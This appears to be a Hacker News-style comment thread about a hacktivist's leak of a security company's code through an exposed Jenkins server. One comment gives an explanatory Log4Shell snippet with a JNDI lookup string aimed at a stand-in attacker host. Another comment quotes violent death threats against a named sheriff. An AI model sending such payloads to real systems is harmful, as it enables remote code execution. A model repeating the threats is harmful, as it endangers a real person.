"however, they made one of the most comedic mistakes you can still make while setting up jenkins (im actually not sure which misconfiguration leads to this): the build information for each past build contains a link to the git repository, including the bitbucket credentials in the url. genius."
No, the most comedic mistake is to have a public-facing Jenkins running. I mean, in general you wouldn't make your CI accessible from the outside, but especially not Jenkins. That software probably has more CVEs every year than all of our other tooling combined.
And that's just the ones that get reported. Since core Jenkins is pretty bare-bones, most instances also have many plugins installed, and most of those aren't properly reviewed at all.
The vast majority of those Jenkins CVEs seem to be for a wide variety of plugins, so it seems someone is putting in quite a bit of work to review them.
Yes, to give credit, they do monitor the most important ones which almost everybody uses and which are usually also maintained by developers from Cloudbees. But there are over 1800 plugins for Jenkins, so at least quantitatively, most of them are not monitored.
An externally accessible Jenkins instance is just asking to get pwned.
I worked for a company a couple years ago that had Jenkins running on a Windows EC2 with a bare public IP, no TLS, and a single set of admin credentials shared by everyone. Also, the host did double duty as some sort of DBA jump box and had every possible credential.
It was like defense in depth, in reverse. I tried to explain how crazy it was. They weren't interested in fixing it. I moved on.
The vast majority of gigs/jobs I've had which involved touching Jenkins were for the purpose of migrating elsewhere - Gitlab, GitHub Actions, Drone, Harness...
In case anyone needs reminding: Java developers, on purpose, put a line in a logging library that can fetch and execute code when given a URL string in a log statement.
You joke, but that code made it through rounds of reviews, and nobody saw anything wrong with having a logging library able to make network requests in the first place.
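For anyone who hasn't seen the mechanism, a minimal sketch of Log4Shell (CVE-2021-44228); the hostname is a placeholder, and this only "works" against Log4j 2 versions before the 2.15.0 fix:

```groovy
// In vulnerable Log4j 2 versions, logging attacker-controlled text that
// contains a JNDI lookup made the library itself resolve the reference
// and load remote code.
import org.apache.logging.log4j.LogManager

def log = LogManager.getLogger('demo')

// Single quotes are Groovy literals (no interpolation), so this string
// reaches the logger exactly as an attacker would send it.
def userAgent = '${jndi:ldap://attacker.example/a}'
log.info('request from {}', userAgent) // vulnerable versions resolve the lookup here
```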
I honestly don't even blame the developers of Log4j that much, because after all it's open source, and nobody is paying them; you use it despite the idiocy surrounding shit like that.
I do however blame the developers that use Java, see things like this happen, and then continue to use it with Log4j after the patch like nothing ever happened.
The most horrible thing Jenkins does to devs is that it encourages bad practice. Good practice is so cumbersome to do properly (create a secret, load the secret into the environment through Groovy code, set up the git configuration in a shell script) that, unless someone is actively monitoring them, devs are always tempted to just put the credentials in the git URL, thinking "we'll remove them after testing". Then one time out of N they forget, and you get a security hole.
Uh, no, you just pick credentials from the list in the repo config.
If you wanted to download an additional repo in the Jenkins script, sure. But the Jenkins Git plugin just accepts a credential (whether it's a password or a pub/priv key pair): you paste the URL and select one from the list.
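For illustration, a minimal declarative Jenkinsfile sketch; the repo URLs and the credential ID 'bitbucket-creds' are made-up names for a credential held in Jenkins' credential store:

```groovy
pipeline {
    agent any
    stages {
        stage('Checkout') {
            steps {
                // The URL carries no username or password; Jenkins injects
                // the stored credential at clone time.
                git url: 'https://bitbucket.org/example-org/example-repo.git',
                    credentialsId: 'bitbucket-creds'
            }
        }
        stage('Extra repo') {
            steps {
                // For ad-hoc clones, withCredentials masks the values in the
                // console log, unlike hard-coding them into the URL, where
                // they can end up in build metadata (the mistake from the
                // article). Note the secret still lands in the clone's
                // .git/config with this pattern, so clean up after use.
                withCredentials([usernamePassword(credentialsId: 'bitbucket-creds',
                                                  usernameVariable: 'GIT_USER',
                                                  passwordVariable: 'GIT_TOKEN')]) {
                    sh 'git clone https://$GIT_USER:$GIT_TOKEN@bitbucket.org/example-org/other-repo.git'
                }
            }
        }
    }
}
```

(The single-quoted sh string is deliberate: the variables are expanded by the shell from the injected environment, not interpolated by Groovy, which keeps the secret out of the pipeline's own logs.)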
It's 2023; it's far past the time when open-source projects could be made without security being the #1 concern, even above the basic functionality of the app. But Jenkins has been around since 2011, so it's understandable that the security posture is obtuse and tacked-on. It's time for some other CI project to surpass Jenkins. I won't be sorry to see it go. Security should be front and center, the first thing the user sees. The defaults should be secure out of the box, and if the user does something stupid, it should be painfully clear to everyone, even the least technical user who looks at it, that something is wrong.
That said, I doubt that what happened here was a Jenkins configuration problem, and instead something to do with the build scripts they're running on Jenkins. You can't solve every class of stupid, sadly.
A quick glance at the history of the article shows it was edited by multiple usernames and IP addresses at different times. How did you come to the conclusion that it was self-authored?
Funny to think about: "writing your own Wikipedia page without it getting taken down for Original Research" is a fun first hobby project to certain kinds of network-security people, as much as "making your Github activity graph solid green" is a fun first hobby project to bot programmers.
Because this is a person who doesn't meet the notability requirements for Wikipedia, and the article goes into a level of detail that is also totally unnecessary. It is trivial to connect to different servers via VPN, and creating new usernames on Wikipedia takes seconds.
They clearly do meet the notability requirements; the cites on this article are almost as long as the article itself. Notability on Wikipedia is a term of art; it refers ("mostly") to how much of the content of the article can be drawn from (ideally diverse) secondary sources. It's not an achievement award.
Wikipedia has protections against this; it is not trivial. Each change by a random IP also has to be accepted by an editor with permissions, and getting those permissions is not easy. It might be possible to bypass all the abuse countermeasures, but it takes a lot of effort.
Easy to check on Wikipedia: it looks like it was created by the user Ezlev [0], who does not appear to be crimew's Wikipedia account, and updated by several other users over the last couple of years.
Because this literal fugitive hacktivist is clearly incapable of finding creative ways to get diversified contributions to their Wikipedia page. Heck, they even proudly link to their WP page from their personal site. If they didn't write the article themself, then it was most likely a friend who's close enough to write something that screams self-authored page. Like c'mon, just look at the thing. Have you ever seen that many citations on something that isn't just spamming them trying to stave off the Wikipedia police?
It does seem weirdly detailed for someone I would mark as not really encyclopedically significant, but it has the citations and quotes, so what do I know. It's one of the better Wikipedia articles in general.
However, it is not self-authored as can be seen in the history of the article.
Back in the 90s, I commented to a friend that there sure were a lot of NASA employees on a certain IRC channel. His response was that NASA had great computers and no security.
In the 90s I would be hard-pressed to name any of my techie chums who didn't have a shell account on a NASA box, through legal or illegal means. NASA also had some great cables and satellite runs between their facilities and other partners overseas that allowed for moving warez and porn very quickly across the Atlantic when the commercial connection between the UK and USA was something like 2Mbps for the entire country.
Heck, I've heard stories that several big agencies only started deploying firewalls at their network perimeter in the late 90's. I guess one of the saving graces was that a lot of stuff like personnel records were hard to reach or still only on paper.
Perimeter security with firewalls didn't really come into vogue until the mid 1990s (post-Cheswick and Bellovin), so that seems like a pretty speedy adoption for a big agency.
Around here, it was the local colleges and universities. My friend, in high school at the time, pwned the CS departments at both an Ivy and a state college and gave out dozens of cracked SunOS accounts to BBSers and script kiddies (the password file was unshadowed...). Tying up all the dialups with IRC and non-stop warez downloading eventually drew the attention of sysadmins, but it went on for months.
I suspect this leak was made by the author themselves and submitted to 4chan via Tor or a VPN. I don't have hard evidence to back this up but if you read the Wikipedia article about them, it's pretty easy to put two and two together.
Their antics have been of questionable legality, and I would assume they'd try to avoid drawing too much attention, given that this is the 3rd US-based company they're trying to hack, and the US just might ask for an extradition.
Further, the conclusion about Jenkins being the attack vector is drawn without much thought or explanation, and it is also interesting that they've used the same attack vector elsewhere.
It says in the wiki entry that Switzerland does not extradite citizens unless they consent to it. She is probably already not able to leave Switzerland due to her US indictment.
Costs $20 per year and can be paid with various cryptocurrencies. Since 4chan keeps IP logs, this seems like a good deal for someone leaking company source code.
Registration was first attempted in 2012. It was denied and appealed several times and finally recognized in 2019. After some Covid-related delays, it was opened to the public in 2020. https://en.m.wikipedia.org/wiki/.gay
Who still uses Jenkins? It's an abomination of an obsolete system that is just a pain to use, manage, maintain, set up, etc., while there are much better, more fully featured, easier-to-use-and-maintain alternatives out there. And it has been like this for close to ten years now. It should have been ripped out years ago in favour of either the "native" CI/CD (e.g. GitLab CI if GitLab is used for VCS, GitHub Actions if GitHub, etc.) or a modern one like Drone/Concourse/etc. in any place that isn't ~two decades behind (so legacy airlines and banks?).
Switched from a company using Jenkins to one using GitLab CI, and while GitLab CI is obviously "better" in the sense that it has less historical baggage, there are actually quite a few things I'm missing. Jenkins has a plugin for pretty much every obscure thing you can imagine, which is a blessing for the user and a curse for the administrator, as Jenkins quickly becomes Frankenstein's monster.

But every time I have to wade through tons of log output on GitLab I miss Jenkins' warnings plugin, every time no runner is picking up my job I miss the nice runner overview of Jenkins which quickly showed you what runners are actually busy with, and every time that old slow runner is grabbing all the jobs I miss the runner prioritization... I could go on here, but really, there are a lot of things that Jenkins could do through nifty plugins that GitLab CI cannot do yet. I even wrote one plugin myself to support our in-house linter; it really wasn't that difficult, and you could hook into pretty much every little detail (which, again, can also be a curse, because every plugin has the power to simply crash your Jenkins...).
EDIT: So to be clear, I'm not saying "Jenkins is better than GitLab". I would say GitLab CI is better designed, more robust and stable, but Jenkins is more configurable, more extensible, and has more features through its plugin ecosystem. So personally, I wouldn't go back to Jenkins, but I also don't find it ridiculous that people still use it.
A lot of the time when old things are still around, it's not because through all the years nobody has had the idea to replace them, but because the benefit of replacing them hasn't at any point in history outweighed the hassle.
This is true for X11 and this is true for the QWERTY layout. The benefit of switching must outweigh the enormous hassle of doing so. It's easy to find something that's a little bit better, but that's simply not good enough to merit a switch.
Often they're around because, when it comes down to it, they do such a decent job that it's difficult to actually produce something with that sort of advantage over them.
X11 is finally, finally on the way out. I have a lot of gripes with Wayland, but the day I stop needing to dive into xrandr and figure out why the screen is rotated but the mouse coordinates aren't or some other 1990s level problem will be a happy one.
QWERTY seems to be too embedded even for that, but I wonder if it gets closer to replacement the higher the percentage of software keyboards climbs vs physical ones.
> but the day I stop needing to dive into xrandr and figure out why the screen is rotated but the mouse coordinates aren't or some other 1990s level problem will be a happy one.
I'm sympathetic to wanting legacy mindhorrors replaced with modern stuff, but genuine question:
When do you ever have such problems xD
I've multimonitored on X11 for like 4 years and never experienced that.
Have you tried to multimonitor different combinations of HiDPI + regular DPI on x11? Last time I tried to make different scaling displays work together on x11 the experience was so nightmarish that I went back to windows.
I run into problems like that a lot; I guess I do edge case things. That particular example was on an Intel Atom Bay Trail tablet (garbage architecture) I resurrected with a lightweight distro. It was a huge improvement, but there was no support for auto rotation, and manual rotation turned the screen but not the mouse coordinates sent by the digitizer. This meant touch inputs were mirrored or flipped or both.
This wasn't an old-school problem, either, it was three months ago.
Do you know the cost of maintaining big old systems?
There are hundreds of people here for that
I'm not in HR, but I guess that's a lot of money spent each year, just to get the same issues we had last year
It takes a lot of money to not improve the situation
Jenkins is one of those things you configure and forget about...until you need to do it again.
Over time, there's so much stuff that it does that replacing it is a ton of work. And by work I mean verification and communication. Many developers have no idea how stuff gets built, or how dependencies are managed in the build system. You forget one thing and the build is toast. Hunting this info down takes a ridiculous amount of time.
Now expand that to X number of projects, and you're looking at a year of work...and a delay while QA checks everything again.
Why change something that mostly works fine? I don't like to trade a set of known issues for a set of unknowns.
Also those who want to avoid vendor lock-in. A Git repo might be moved around; do you like changing your CI/CD scripts every time you change your git hosting service?
GHA works really well for simple stuff. For more complex needs in a larger organization, there is no clear winner.
Big companies with data restrictions that can't have anything so much as look at the cloud, and they don't have the skills or money to set up something nicer on prem.
Bitbucket is also a big part of this story.
That results in seeing Jenkins all over the ding-darn place at Boeing, LockMart, RC, L3, NGA, etc.
Of course, all that is thrown right out the window if you wire up the Jenkins instance to the goddamn internet.
I guess that works if you want your jobs to run on a schedule; I prefer push-based (you make a commit, you push it to the central copy of the repo, and it automatically triggers jobs).
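In Jenkins declarative syntax, both styles look something like this (a sketch; cron and pollSCM are core triggers, while true push triggering needs a webhook from the Git host to Jenkins, which is exactly what makes the internet-exposure question above so thorny):

```groovy
pipeline {
    agent any
    triggers {
        cron('H 2 * * *')       // schedule-based: build nightly, changes or not
        pollSCM('H/5 * * * *')  // push-ish: poll every ~5 min, build only on new commits
    }
    stages {
        stage('Build') {
            steps {
                sh 'make'
            }
        }
    }
}
```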
Oh they have come up with some new trash I have to learn? Great...
Say you were developing in Angular and Python. Which one of these "alternatives" should I look into? i.e., which is most requested by typical recruiters?
Jenkins is still inherently more full-featured than anything that just runs random docker images and commands. Any replacement would need to do the hard work of actually integrating with a bunch of different language build tools in a deep way, and so far no-one's stepped up.
It doesn’t work well. It’s the JIRA of CI/CD: it is entrenched and does multiple things but doesn’t do any one thing well, and the people that decide what to buy aren’t the people who are forced to use it so they don’t care about its quality so much
Jenkins is what I want to use, because for all its clunkiness it has a better deep integration with my actual build tools than any other CI tool I've ever seen. It's a pain for the admin but it's great for the user, so if anything it's the opposite of JIRA.
I like that with Jenkins you can use Groovy, which gives you some extra power as far as writing commands is concerned. You don't have to do everything via shell; equivalent shell commands can be a bit messy sometimes.
It was a bit painful to write the same stuff in GitHub Actions. Jenkins' Groovy scripting made loops and storing variables very easy compared to GitHub Actions' YAML.
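For example, fanning the same step out over a list is plain Groovy in a scripted pipeline (the target names here are made up); in Actions you'd reach for a YAML matrix strategy instead:

```groovy
// Scripted-pipeline sketch: build several targets in parallel.
def targets = ['linux', 'windows', 'macos']
def branches = [:]
for (t in targets) {
    def target = t  // capture the loop variable for the closure below
    branches[target] = {
        node {
            sh "make build TARGET=${target}"
        }
    }
}
parallel branches
```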
Do not attribute to NSA conspiracy what can more simply be explained by the company being fucking stupid and not caring about walking the walk of infosec
Here is how lawyers in Germany do it. They ask ISPs for the person behind the IPs (cough, cough, carrier grade NAT) and then they send cease and desist letters demanding 800€. If you sign their letter you are considered guilty but avoid further consequences, similar to a plea bargain.
It only takes a dozen people having money and fearing court for this to be profitable. The lawyer doesn't want to go to court because that costs money, he just wants you to confess and get paid.
>3. now you have IP addresses of possibly nefarious people without needing to subpoena 4chan
ahahah 4chan is almost as mainstream as Reddit. ahahahahahahaaaaaaa you really think they would waste time like this for IP addresses to "keep track of"
The "bait" this comment is referring to is that a Sheriff publicly denounced in a press conference a bunch of neo-nazi messaging spread around his town during a racecar event.
> "It's too bad Mike Chitwood isn’t safe now that I'm planning to kill him. I'm going to shoot Mike Chitwood. I'm going to kill him by shooting him to death."
> "Just shoot Chitwood in the head and he stops being a problem. They have to find a new guy to be the problem. But shooting Chitwood in the head solves an immediate problem permanently. Just shoot Chitwood in the head and murder him."
Aren't these industry awards essentially participation trophies for whoever is willing to pay? Like the notorious "Who's Who Among American High School Students" in the US.
> which makes it all so much more ironic how completely they have been hacked.
Nope, not really. It just takes one mistake and you're pwned. Imagine giving the intern a small project while you're buried in your main project, with no time to supervise. Boom.
/e: Or imagine an update in one of your libs/apps. In order not to be hacked, you need to get everything right; in order to hack, you just need to find one mistake. Well, kinda, but you know what I mean.
It only takes one mistake, but this was a pretty easy one to prevent. At a mature company with a decent security program, creating an internet facing Jenkins instance wouldn't have been approved by IT, doesn't matter if it was an intern with an overworked manager trying to set it up. So it is pretty bad that a security company failed at something as basic as minimizing their attack surface (and possibly not sufficient segmentation between the dev environment and customer data, but the post is not very detailed on that part). Not surprising, though.
I guess they meant paradoxical. Being a security company makes them a juicy target for an attacker's rep, meaning they are in a situation where they are both more protected than usual and also more at risk. That's the arms race paradox, I guess.
I always tell myself that if I ever start any kind of business, I'll make sure to host my website as static content on a read-only file system. And customer data will be handled by a 3rd party.
Apparently so, considering that this is the same person who got a hold of the No-Fly List a while back, and, you guessed it, they found it through Jenkins somehow.
>if you enjoyed this or any of my other work feel free to support me on my ko-fi. this is my only real source of income so anything goes a long way, and monthly contributions help tremendously with budgeting
As the creator was born in 1999, it's interesting to me because she's nostalgic for a period she did not fully experience. It's something I did, and it's neat yet strange to see it being done to a part of my past.
I'm not a lot older than her and have a similar fondness for that æsthetic. While it's true I didn't fully experience it, a lot of late 90's sites were still online, more or less untouched, in the late 2000's, so they were there to be appreciated even though they were a relic by then. At that time, IE stagnation was still a thing, and MIDI playback was still in browsers, so the 2008 experience of a 1998 site was probably fairly authentic.
I am in a similar age range and I am drifting towards this aesthetic. I think it's a counterculture to the increasingly sleek websites with their overcomplicated 3D animations. Not saying either is better than the other; it's just the opposite end of the spectrum, and a way of still having fun when creating a website while making it feel personal.
It reminds me of the phenomenon of parodying 'I Love Lucy'. Even though it hasn't seen new episodes since 1957, it is included or mentioned in some way in nearly every piece of popular media.
The constant revitalization of the parody through new works ensures that the future will also include some mention. I think 90s aesthetic/internet-culture is a bit like that -- the projects that include those themes beget new similar projects in the future as long as they have some level of audience exposure.
I feel this. It seems like somewhere I would have thrived and immensely enjoyed, and I hear people's nostalgia for it, but it's something I never got to experience myself. (~18yo).
Yeah, it was freakin' awesome. All my friends and I made websites. We linked to each other, shared sources of good GIFs and images, chatted on IRC, eventually shared mp3s when those were a thing. It was a seriously badass time to grow up. I regularly feel very thankful/lucky to have grown up in that time period and have my own online computer to experience all that stuff!
>It's something I did, and it's neat yet strange to see it being done to a part of my past.
Agree. I read recently that digital cameras have been taking off among younger people in the way vinyl took off among millennials. I'm excited to see how people that grew up with excessive, toxic social media manage to find better solutions for dealing with the internet
This is common among younger people joining the internet. And the creator of SpaceHey.com was nostalgic for the days of old social media, which happened when he was too young to experience them.
I have a soft spot a mile wide for SpaceHey; there's just something about the whole idea that's really nice. I'm not sure how much of it is because building a whole social media platform out of nostalgia is a very hacker-like thing to do, and how much is just because it's nice to see a social media platform that's not so aggressively monetised and manipulative, but either way I'm really happy it exists.
You might have liked Lulzsec's website. They had an auto-playing audio clip of the Love Boat TV theme and an ASCII ship above text lyrics that replaced the word 'love' with 'lulz'. It was refreshingly amusing.
Sadly archive.org doesn't have a copy from its live state; however, I saved the home page at the time (MHTML ftw) and here's a video capture of it*: https://streamable.com/zon5wy
* Expires in one day
Edit: for context Lulzsec were a hacking group a decade back responsible for various headline-making leaks and website hacks.
It's been a long time since I had the sensation of going from a site with a brightly/strongly coloured background to another on white/beige and my eyes not being able to handle it. I really quite enjoyed it.
You don't really have to know what specific year they were born in; the refusal to capitalize is a dead giveaway that they did not experience that time at all. Anybody from that time period would be embarrassed to do so on a public site.
Kind of funny how we carry these different meanings to mostly meaningless things.
I had an all-lowercase website for a couple years on the early web. So did many of my friends. Archive.org snapshots are 2000-2001, but they'd been around before that in many iterations.
Gah.. it's all embarrassing to look back on for other reasons...
Specifically about this style, though: I feel it fits right into the blog series about "domestic cozy"[1]. It aims to be exactly that: imply a super casual/low-effort tone, make it feel a bit more personal, and simultaneously ignore social traditions that feel redundant to them. Like all trends, it takes effort to follow, and part of this is encouraging friends to turn off auto-capitalization on their phones.
So I would say it's a bit more than just trying to make something hard to read, and focusing on that bit might make you miss the rest of their storytelling process!
So it uses it/she pronouns? Usually the object pronoun is second; does that mean that it wants people to call she "it" unless they're doing something to she? That's off the chain, and sounds like meta-trolling.
There are two forms of pronoun listings. The first form is multiple pronouns, "he/them" or "it/she". They are alternatives; both can be used, though I think the first listed is preferred.
The second form is different cases, "he/him". I have a theory that people started using that because they didn't want to put just "he"; they were following the multiple-pronoun form and it stuck. People aren't really specifying cases, because nobody uses different cases, and nobody puts cases in the multiple-pronoun form.
You should check out the game Hypnospace Outlaw, which is set basically in a geocities-forum hybrid environment. It's basically a love letter to this old very personal internet.
0 times out of ten for me. First I blocked the annoying cat, then I got to the bottom, was assaulted by blinking buttons and decided I didn’t need to know what else they were saying anyway.
Interestingly, had this complaint been about an ad, parent would have been upvoted with hundreds of comments agreeing with them.
In other words, what OP is trying to say is that websites should be designed with the user's goals in mind, and IMO it's fair to say that this website wasn't designed that way.
Ads are generally not nostalgic references (and when they are, you still know that it's someone ultimately trying to push your emotional buttons to get you to give them money).
Because at the end of the day, the problem with ads isn't that they're annoying, or get in the way, or are garish, or whatever else. The problem with ads is that they are ads. They're an overt attempt to hijack your attention and implant ideas in your head, ideas that are antithetical to your own wellbeing.
A little cat chasing my cursor is just plain fun. No malice involved.
"pwned" is from a late-90s StarCraft custom map where the map creator typo'd "owned" as "pwned" in a message that popped up when one player beat another.
Native speaker, and title confused me even being familiar with the whole owned/pwned thing. I clicked on the article simply because I was curious why being a 4chan-using sole proprietor would be at all interesting.
No, just the ones where the result is a leak of information on some large government surveillance program, or, say, exposing incompetence of a company that sells security-related products - especially ones focused on "intellectual property".
Not that there's anything wrong with lulz as a motivation from the perspective of old-time hacker ethos.